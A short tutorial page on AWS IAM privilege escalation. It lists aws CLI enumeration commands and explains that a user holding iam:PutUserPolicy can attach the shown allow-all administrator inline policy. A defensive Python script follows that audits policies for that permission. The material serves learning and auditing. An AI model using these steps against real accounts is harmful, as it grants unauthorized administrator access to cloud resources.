Privilege Escalation

Case Study

Exploitation

  1. Getting the IAM user
aws sts get-caller-identity

  1. Listing policies attached to a user
aws iam list-attached-user-policies --user-name example_name --profile example_profile

  1. Retrieving information about a specific policy
aws iam get-policy --policy-arn policy_arn

If there is more than one version of the policy, we can also list them

aws iam list-policy-versions --policy-arn policy_arn

Now we can finally retrieve the contents of the policy

aws iam get-policy-version --policy-arn example_arn --version-id id_example

It's important to use the command above to check the information about the default policy version

  1. Escalation

If our user has the PutUserPolicy permission (iam:PutUserPolicy), we can add an inline administrator policy to our user.

Administrator policy example

{
	"Version": "2012-10-17",
	"Statement" : [
		{
			"Effect":"Allow",
			"Action": [
				"*"
			],
			"Resource":[
				"*"
			]
		}
	]
}
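
From the defender's side, the policy documents retrieved with get-policy-version can be audited for this same condition. The Python script below is an added example, not part of the original page: it flags Allow statements that grant iam:PutUserPolicy directly, through a wildcard, or through NotAction. The function names, sample documents and Sids are constructed for illustration.

```python
import fnmatch

def _as_list(value):
    # IAM accepts a single string/object wherever a list is expected.
    if value is None:
        return []
    return value if isinstance(value, list) else [value]

def _matches(patterns, action):
    # Action names are case-insensitive; "*" and "?" are wildcards.
    return any(fnmatch.fnmatchcase(action.lower(), str(p).lower()) for p in patterns)

def risky_statements(policy_doc, action="iam:PutUserPolicy"):
    """Return the Allow statements of a policy document that grant `action`.
    Resource, Condition, explicit Deny, permission boundaries and SCPs are
    not evaluated, so a hit means "review this", not "exploitable".
    """
    hits = []
    for stmt in _as_list(policy_doc.get("Statement")):
        if stmt.get("Effect") != "Allow":
            continue
        granted = False
        if "Action" in stmt:
            granted = _matches(_as_list(stmt["Action"]), action)
        elif "NotAction" in stmt:
            # Allow + NotAction grants everything except the listed actions.
            granted = not _matches(_as_list(stmt["NotAction"]), action)
        if granted:
            hits.append(stmt)
    return hits

# Constructed samples, shaped like the "Document" field that
# `aws iam get-policy-version` returns.
SAMPLES = {
    "explicit": {"Version": "2012-10-17", "Statement": [
        {"Sid": "Read", "Effect": "Allow", "Action": ["iam:Get*", "iam:List*"], "Resource": "*"},
        {"Sid": "SelfManage", "Effect": "Allow", "Action": "iam:PutUserPolicy", "Resource": "*"}]},
    "wildcard": {"Version": "2012-10-17", "Statement":
        {"Sid": "PutAll", "Effect": "Allow", "Action": "iam:put*", "Resource": "*"}},
    "notaction": {"Version": "2012-10-17", "Statement": [
        {"Sid": "AllButS3", "Effect": "Allow", "NotAction": "s3:*", "Resource": "*"}]},
    "read_only": {"Version": "2012-10-17", "Statement": [
        {"Sid": "Read", "Effect": "Allow", "Action": ["iam:Get*", "iam:List*"], "Resource": "*"}]},
}

if __name__ == "__main__":
    for name, doc in SAMPLES.items():
        print(name, [s.get("Sid") for s in risky_statements(doc)])
```

Statements it flags are candidates for scoping down, for example by restricting Resource or adding a permissions boundary.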